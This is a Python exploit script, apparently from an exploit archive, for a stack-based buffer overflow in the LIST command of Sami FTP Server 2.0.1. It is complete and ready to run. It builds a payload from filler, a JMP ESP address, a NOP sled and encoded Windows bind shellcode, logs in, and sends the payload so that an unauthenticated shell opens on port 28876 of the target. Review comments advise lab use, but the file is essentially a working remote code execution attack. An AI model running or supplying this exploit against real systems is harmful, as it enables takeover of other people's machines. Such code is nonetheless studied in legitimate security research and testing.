
# Title : Sami FTP Server 2.0.1 LIST Command Buffer Overflow
# Published : 2013-03-01
# Author :


#!/usr/bin/env python

# Exploit Title: Sami FTP LIST buffer overflow
# Date: 27 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.karjasoft.com/old.php
# Version: Sami FTP Server 2.0.1
# Tested on: Windows XP Pro SP1, English
#            Windows XP Pro SP2, English
#
# Description: 
# A stack-based buffer overflow is triggered when an over-long LIST argument
# is sent to the server and an operator then views the Log tab in the
# server's GUI; the crash (and thus the shellcode) waits on that user action.
#

from socket import *
import struct, sys

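# ---------------------------------------------------------------------------
# Target / payload parameters.
#
# Written for Python 3: the payload is assembled as bytes so no byte is ever
# re-encoded on the way to the wire (the original Python 2 str payload relied
# on "\x.." escapes that are easily lost when the file is copied around).
# ---------------------------------------------------------------------------
FTP_PORT = 21          # control channel the server listens on
BIND_PORT = 28876      # port the bind shellcode listens on once it runs
EIP_OFFSET = 218       # bytes of filler before the saved return address is hit
NOP_SLED = 37          # NOPs between the return address and the shellcode
# JMP ESP at 0x10028283 in C:\Program Files\PMSystem\Temp\tmp0.dll.
# NOTE(review): the author calls this "Universal" because the gadget lives in a
# third-party DLL rather than in an OS module; it still assumes that DLL is
# loaded at its preferred base (no ASLR on the XP SP1/SP2 targets this was
# tested on). Re-verify the address in a debugger before using another build.
JMP_ESP = 0x10028283
# Bytes that must not appear anywhere in the payload -- the msfencode -b list
# the author used when encoding the shellcode: NUL, LF, CR and '/'.
BAD_CHARS = b"\x00\x0a\x0d\x2f"

# Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
# Bad chars removed with msfencode:
#   msfencode -b "\x00\x0a\x0d\x2f" -i w32-bind-ngs-shellcode.bin
#   [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
# NOTE(review): this is a *bind* shell -- once it runs it listens on BIND_PORT
# on the target with no authentication, so anyone who can reach that port gets
# the shell. Use only against lab machines you own; on an engagement swap in a
# reverse or otherwise access-controlled payload and keep check_bad_chars()
# in the loop so the replacement is screened for the same bad bytes.
shellcode = (
    b"\xd9\xc7\xbe\x4d\xa5\xde\x30\xd9\x74\x24\xf4\x5f\x2b\xc9"
    b"\xb1\x36\x31\x77\x19\x03\x77\x19\x83\xc7\x04\xaf\x50\xef"
    b"\xf9\x4b\x10\x61\xca\x18\x50\x8e\xa1\x68\x81\x05\xdb\x9c"
    b"\x32\x67\x04\x17\x72\xa0\x0b\x3f\x0e\x23\xc2\x57\xc2\x9c"
    b"\xd6\x95\x4a\x45\x4f\xae\xf9\xe1\xd8\xdf\xf7\x69\xaf\x39"
    b"\xb2\x89\x99\x09\x94\x41\x50\x76\x31\xaa\xc9\x39\xef\x0c"
    b"\x5f\xee\x5e\x0c\xb0\x3c\xc5\x5d\xc4\x61\x39\xe9\x86\x84"
    b"\x39\xec\xdd\x3d\xf2\xce\x20\xa8\x53\x3e\xf1\x68\xd7\x74"
    b"\x64\x6d\x09\xc0\xb0\xc1\xe1\x58\x95\xdd\x36\xea\x90\x2a"
    b"\x7c\x2b\x2e\x3f\xdf\xb8\x9b\x9b\xe1\x57\x14\x54\xf5\xf6"
    b"\xa0\xd1\xea\xf9\x5f\x6c\xfa\xf9\x9b\xff\x50\x7d\x9d\xf6"
    b"\xd3\x76\x6f\x56\x18\xd4\x90\xb6\x77\x4f\xee\x08\x0b\x1a"
    b"\x5e\x2a\x46\x1b\x70\x7f\x67\x34\xe4\xfe\xb7\x4b\xf8\x8f"
    b"\xfb\xd9\x17\xd8\x56\x48\xe7\x36\x2d\xb3\x63\x4e\x1f\xe6"
    b"\xde\xc6\x03\x6b\xbb\x36\x49\x0f\x67\x0e\xfa\x5b\xcc\xa8"
    b"\xbb\x72\x12\x60\xc3\xb9\x31\xdf\x99\x93\x6b\x19\x5a\xfb"
    b"\x84\xf2\x37\x51\xc2\xae\x48\x03\x08\xc5\xf1\x50\x39\x13"
    b"\x02\x57\x45"
)


def check_bad_chars(payload, bad_chars=BAD_CHARS):
    """Return *payload* unchanged, or raise ValueError if it contains a bad byte.

    A bad byte would be mangled by the server or would cut the LIST argument
    short, so the return address or shellcode would never land intact. The
    shipped payload passes; the check protects whoever swaps in other
    shellcode or changes JMP_ESP.

    Raises:
        ValueError: listing the offending bytes in hex.
    """
    found = sorted({b for b in payload if b in bad_chars})
    if found:
        raise ValueError(
            "payload contains bad chars: "
            + ", ".join("0x%02x" % b for b in found)
        )
    return payload


def build_payload():
    """Return the LIST argument: filler, return address, NOP sled, shellcode.

    Layout, in order: EIP_OFFSET bytes of 'A' up to the saved return address,
    JMP_ESP packed little-endian over EIP, NOP_SLED NOPs that ESP points into
    after the jump, then the encoded shellcode. With the shipped constants the
    argument is 500 bytes long. The result is screened with check_bad_chars().
    """
    payload = (
        b"A" * EIP_OFFSET
        + struct.pack("<I", JMP_ESP)
        + b"\x90" * NOP_SLED
        + shellcode
    )
    return check_bad_chars(payload)


def _recv_text(sock):
    """Read up to one 1024-byte response chunk and decode it for display."""
    # latin-1 never fails, so a stray non-ASCII byte in a banner can't abort
    # the run; this is display only, the reply codes are not interpreted.
    return sock.recv(1024).decode("latin-1")


def send_exploit(ip, port=FTP_PORT, timeout=10.0):
    """Log in with the fixed credentials and send the oversized LIST to *ip*.

    Reply codes are printed but not checked, as in the original; whether the
    server needs a successful login before a LIST is logged is not established
    here. The overflow itself fires only when an operator opens the Log tab in
    the server GUI, so a missing reply to the LIST is not treated as failure.

    Raises:
        OSError: if the connection cannot be established or the login
            exchange fails (including a *timeout* on those reads).
    """
    payload = build_payload()
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(timeout)  # never hang forever on a silent or crashed server
    try:
        sock.connect((ip, port))
        print(_recv_text(sock))

        sock.sendall(b"USER superkojiman\r\n")
        print(_recv_text(sock))

        sock.sendall(b"PASS letmein\r\n")
        print(_recv_text(sock))

        print("[+] sending payload of size %d" % len(payload))
        # sendall, not send: send() may write only part of the 500 bytes.
        sock.sendall(b"LIST " + payload + b"\r\n")
        try:
            print(_recv_text(sock))
        except OSError as exc:
            # A timeout or a dropped connection here is expected behaviour for
            # a server that has stopped answering; sendall already completed.
            print("[*] no reply to LIST (%s); payload was delivered" % exc)
    finally:
        sock.close()


def main(argv=None):
    """Entry point: ``exploit.py <target-ip>``. Returns a process exit code."""
    args = sys.argv[1:] if argv is None else list(argv)
    if len(args) != 1:
        sys.stderr.write("usage: %s <target-ip>\n" % (sys.argv[0] or "exploit.py"))
        return 2
    ip = args[0]
    send_exploit(ip)
    print("[+] sent. Connect to %s on port %d" % (ip, BIND_PORT))
    return 0


if __name__ == "__main__":
    sys.exit(main())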